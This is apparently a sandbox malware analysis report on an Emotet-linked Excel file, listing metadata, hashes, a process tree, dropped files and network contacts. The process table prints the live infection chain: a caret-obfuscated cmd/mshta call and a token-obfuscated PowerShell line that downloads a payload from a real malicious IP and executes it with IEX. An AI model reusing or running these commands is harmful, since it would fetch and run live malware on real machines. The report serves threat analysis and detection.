File name: | Info_774757202.xls |
Full analysis: | https://app.any.run/tasks/72674a47-af57-4719-82f3-a2abff1202a1 |
Verdict: | Malicious activity |
Threats: | Emotet is one of the most dangerous trojans ever created. Over the course of its lifetime, it was upgraded to become a very destructive malware. It targets mostly corporate victims but even private users get infected in mass spam email campaigns. |
Analysis date: | January 24, 2022, 23:55:05 |
OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
Tags: | |
Indicators: | |
MIME: | application/vnd.ms-excel |
File info: | Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, Code page: 1251, Author: xXx, Last Saved By: xXx, Name of Creating Application: Microsoft Excel, Create Time/Date: Mon Jan 24 14:50:55 2022, Last Saved Time/Date: Mon Jan 24 15:24:17 2022, Security: 0 |
MD5: | 661C7531C880D43EA79ABCFDD601CB88 |
SHA1: | FB9D14DC1589C48AF985B83882A4191E8CAC0790 |
SHA256: | 48381201170794D6DDBC713A1A5BC89CE39472D3EB35A9173FA84D992AA9DFDC |
SSDEEP: | 3072:AH+Hyms/k3hbdlylKsgqopeJBWhZFGkE+cMLxAAIixe53lGvFTQ3IzxgdrvxpU0f:e+Hyms/k3hbdlylKsgqopeJBWhZFVE+i |
.xls | | | Microsoft Excel sheet (78.9) |
---|
HeadingPairs: |
|
---|---|
TitleOfParts: |
|
HyperlinksChanged: | No |
SharedDoc: | No |
LinksUpToDate: | No |
ScaleCrop: | No |
AppVersion: | 16 |
Company: | - |
CodePage: | Windows Cyrillic |
Security: | None |
ModifyDate: | 2022:01:24 15:24:17 |
CreateDate: | 2022:01:24 14:50:55 |
Software: | Microsoft Excel |
LastModifiedBy: | xXx |
Author: | xXx |
PID | CMD | Path | Indicators | Parent process |
---|---|---|---|---|
2152 | "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /dde | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | — | Explorer.EXE |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Excel Version: 14.0.6024.1000 | ||||
276 | cmd /c ms^ht^a ht^t^p:/^/0x^5cf^f^39c^3^/^sec^/^se4.html | C:\Windows\system32\cmd.exe | — | EXCEL.EXE |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 0 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | ||||
2856 | mshta http://0x5cff39c3/sec/se4.html | C:\Windows\system32\mshta.exe | cmd.exe | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft (R) HTML Application host Exit code: 0 Version: 11.00.9600.16428 (winblue_gdr.131013-1700) | ||||
2656 | "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit $c1='({GOOGLE}{GOOGLE}Ne{GOOGLE}{GOOGLE}w{GOOGLE}-Obj{GOOGLE}ec{GOOGLE}{GOOGLE}t N{GOOGLE}{GOOGLE}et{GOOGLE}.W{GOOGLE}{GOOGLE}e'.replace('{GOOGLE}', ''); $c4='bC{GOOGLE}li{GOOGLE}{GOOGLE}en{GOOGLE}{GOOGLE}t).D{GOOGLE}{GOOGLE}ow{GOOGLE}{GOOGLE}nl{GOOGLE}{GOOGLE}{GOOGLE}o'.replace('{GOOGLE}', ''); $c3='ad{GOOGLE}{GOOGLE}St{GOOGLE}rin{GOOGLE}{GOOGLE}g{GOOGLE}(''ht{GOOGLE}tp{GOOGLE}://92.255.57.195/sec/se4.png'')'.replace('{GOOGLE}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI|I`E`X | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | mshta.exe | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Version: 10.0.14409.1005 (rs1_srvoob.161208-1155) |
PID | Process | Filename | Type | |
---|---|---|---|---|
2152 | EXCEL.EXE | C:\Users\admin\AppData\Local\Temp\CVR2DA4.tmp.cvr | — | |
MD5:— | SHA256:— | |||
2856 | mshta.exe | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\PO2HN1X2\se4[1].htm | binary | |
MD5:EE3D40A393DFC20684FDCD4282DA0284 | SHA256:2C8F62708A16B068433ED479A0E16143257BD15B91EF904F30642CD0E24716DD | |||
2152 | EXCEL.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Office\Recent\index.dat | ini | |
MD5:10A06E44FA557E4ACDC37A96D3628AD1 | SHA256:CC1DCE7BEA7261049C9955CCEBFC5FF90D09558C95732AF04F5F34599B261D6C | |||
2152 | EXCEL.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Office\Recent\Info_774757202.xls.LNK | lnk | |
MD5:0AE9C087F4AC4877297C2ACB5749D090 | SHA256:9818F5204D20A251F8F040759E0E8CBABD5A3FD522937B63270197ABAA4034FC | |||
2656 | powershell.exe | C:\Users\admin\AppData\Local\Temp\juqkklfv.2yk.psm1 | binary | |
MD5:C4CA4238A0B923820DCC509A6F75849B | SHA256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B | |||
2656 | powershell.exe | C:\Users\admin\AppData\Local\Temp\rprbq0rt.eho.ps1 | binary | |
MD5:C4CA4238A0B923820DCC509A6F75849B | SHA256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B | |||
2656 | powershell.exe | C:\Users\admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache | binary | |
MD5:1068BF0B9B98C206F587A7DB05F6DD06 | SHA256:534478EDAFC5087DAA3749624454988B1F7DF923BF1A0A9E28C5F97C3308CFDB |
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
---|---|---|---|---|---|---|---|---|---|
2856 | mshta.exe | GET | 200 | 92.255.57.195:80 | http://92.255.57.195/sec/se4.html | RU | binary | 10.9 Kb | malicious |
PID | Process | IP | Domain | ASN | CN | Reputation |
---|---|---|---|---|---|---|
2656 | powershell.exe | 92.255.57.195:80 | — | Telecom SP Ltd | RU | malicious |
2856 | mshta.exe | 92.255.57.195:80 | — | Telecom SP Ltd | RU | malicious |